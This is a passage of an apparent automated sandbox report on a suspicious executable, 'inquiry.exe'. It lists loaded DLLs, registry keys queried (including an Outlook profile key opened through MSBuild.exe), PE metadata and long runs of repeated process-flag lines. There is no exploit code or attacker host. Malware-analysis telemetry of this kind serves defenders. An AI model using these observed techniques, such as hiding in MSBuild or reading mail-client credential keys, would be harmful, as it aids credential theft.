Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\inquiry.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\inquiry.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: inquiry.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: inquiry.exe

Static file information: File size 1399327 > 1048576

Source: inquiry.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Windows.Forms.pdb source: WER355F.tmp.dmp.15.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WER355F.tmp.dmp.15.dr
Source:	Binary string: mscorlib.pdb source: WER355F.tmp.dmp.15.dr
Source:	Binary string: System.ni.pdbRSDS source: WER355F.tmp.dmp.15.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WER355F.tmp.dmp.15.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER355F.tmp.dmp.15.dr
Source:	Binary string: System.Drawing.pdb source: WER355F.tmp.dmp.15.dr
Source:	Binary string: mscorlib.ni.pdb source: WER355F.tmp.dmp.15.dr
Source:	Binary string: System.Drawing.ni.pdb source: WER355F.tmp.dmp.15.dr
Source:	Binary string: System.Core.pdb source: WER355F.tmp.dmp.15.dr
Source:	Binary string: Microsoft.VisualBasic.pdbmscorlib.dll source: WER355F.tmp.dmp.15.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER355F.tmp.dmp.15.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER355F.tmp.dmp.15.dr
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER355F.tmp.dmp.15.dr
Source:	Binary string: System.ni.pdb source: WER355F.tmp.dmp.15.dr
Source:	Binary string: System.pdb source: WER355F.tmp.dmp.15.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER355F.tmp.dmp.15.dr
Source:	Binary string: System.Core.ni.pdb source: WER355F.tmp.dmp.15.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER355F.tmp.dmp.15.dr

Source: C:\Users\user\Desktop\inquiry.exe	Code function: 2_2_00007FFAACCD0001 push esp; retf 4810h	2_2_00007FFAACCD0312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010307AD push edi; retf 0000h	10_2_010307CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010307D9 push edi; retf 0000h	10_2_010307DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010307E0 push edi; retf 0000h	10_2_010307EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0103891E pushad ; iretd	10_2_0103891F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01038DDF push esp; iretd	10_2_01038DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01038C2F pushfd ; iretd	10_2_01038C30

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
